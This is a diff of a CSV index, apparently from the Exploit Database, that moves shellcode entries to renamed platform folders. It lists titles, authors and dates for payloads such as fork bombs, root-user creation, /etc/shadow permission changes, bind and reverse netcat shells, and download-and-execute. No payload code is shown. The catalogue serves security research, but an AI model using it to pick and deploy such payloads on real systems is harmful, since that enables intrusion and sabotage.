-13578,shellcodes/lin_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,lin_x86 -13579,shellcodes/lin_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,lin_x86 +13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86 +13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86 +13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86 +13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86 +13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 +13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86 +13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,linux_x86 13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows 13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows -13586,shellcodes/lin_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,lin_x86 -13595,shellcodes/win_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,win_x86 -13599,shellcodes/lin_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 -13600,shellcodes/lin_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 -13601,shellcodes/lin_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 -13602,shellcodes/lin_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86 -13609,shellcodes/lin_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,lin_x86 -13614,shellcodes/win_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,win_x86 -13615,shellcodes/win_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,win_x86 -13627,shellcodes/lin_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,lin_x86 -13628,shellcodes/lin_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,lin_x86 -13630,shellcodes/win_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,win_x86 -13631,shellcodes/win_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,win_x86 -13632,shellcodes/lin_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,lin_x86 -13635,shellcodes/win_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,win_x86 -13636,shellcodes/win_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,win_x86 -13639,shellcodes/win_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,win_x86 -13642,shellcodes/win_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,win_x86 +13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86 +13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86 +13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86 +13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 +13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 +13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86 +13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86 +13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86 +13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86 +13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86 +13635,shellcodes/windows_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86 +13636,shellcodes/windows_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86 +13639,shellcodes/windows_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86 +13642,shellcodes/windows_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86 13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows -13647,shellcodes/win_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,win_x86 -13648,shellcodes/win_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,win_x86 +13647,shellcodes/windows_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86 +13648,shellcodes/windows_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86 13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows -13661,shellcodes/lin_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,shellcode,lin_x86 -13669,shellcodes/lin_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86 -13670,shellcodes/lin_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,lin_x86-64 -13671,shellcodes/lin_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86 -13673,shellcodes/lin_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,lin_x86 -13675,shellcodes/lin_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,lin_x86 -13676,shellcodes/lin_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,lin_x86 -13677,shellcodes/lin_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,lin_x86 +13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,shellcode,linux_x86 +13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 +13670,shellcodes/linux_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86-64 +13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 +13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 +13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86 +13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86 +13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86 13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator -13680,shellcodes/lin_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,lin_x86 -13681,shellcodes/lin_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,lin_x86 -13682,shellcodes/lin_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,lin_x86 -13688,shellcodes/lin_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,lin_x86-64 -13691,shellcodes/lin_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,lin_x86-64 -13692,shellcodes/lin_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,lin_x86 -13697,shellcodes/lin_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,lin_x86 -13698,shellcodes/lin_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,lin_x86 -13699,shellcodes/win_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,win_x86 -13702,shellcodes/lin_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,lin_x86 -13703,shellcodes/lin_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 +13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 +13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 +13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86 +13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 +13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 +13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86 +13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86 +13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 +13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86 +13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86 +13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86 13711,shellcodes/solaris_x86/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",shellcode,solaris_x86 -13712,shellcodes/lin_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,lin_x86 -13715,shellcodes/lin_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,lin_x86 -13716,shellcodes/lin_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,lin_x86 -13719,shellcodes/win_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,win_x86-64 -13722,shellcodes/lin_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,lin_x86 -13723,shellcodes/lin_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 -13724,shellcodes/lin_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 -13725,shellcodes/lin_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 -13726,shellcodes/lin_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,lin_x86 -13728,shellcodes/lin_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,lin_x86 -13729,shellcodes/win_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,win_x86-64 -13730,shellcodes/lin_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,lin_x86 -13731,shellcodes/lin_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,lin_x86 -13732,shellcodes/lin_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,lin_x86 +13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86 +13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86 +13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86 +13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64 +13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86 +13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86 +13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64 +13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86 +13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86 +13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86 13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris -13742,shellcodes/lin_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,lin_x86 -13743,shellcodes/lin_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,lin_x86 -14334,shellcodes/lin_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,shellcode,lin_x86 +13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86 +13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86 +14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86 13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows 13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86 -13908,shellcodes/lin_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,lin_x86-64 -13910,shellcodes/lin_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,lin_x86 -13915,shellcodes/lin_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,lin_x86-64 -13943,shellcodes/lin_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,lin_x86-64 -14014,shellcodes/win_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,win_x86 +13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 +13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 +13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 +13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64 +14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86 14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm 14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm -14119,shellcodes/lin_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,lin_x86 +14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86 14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm 14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm -14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm -14216,shellcodes/lin_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,lin_x86 +14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm +14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86 14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows 14234,shellcodes/linux/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux 14235,shellcodes/linux/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux -14261,shellcodes/generator/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator +14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator 14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux -14288,shellcodes/win_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,win_x86 -14305,shellcodes/lin_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,lin_x86-64 -14332,shellcodes/lin_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,shellcode,lin_x86 -14691,shellcodes/lin_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,lin_x86 +14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86 +14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64 +14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86 +14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86 14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows 14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86 -14873,shellcodes/win_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,win_x86 +14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 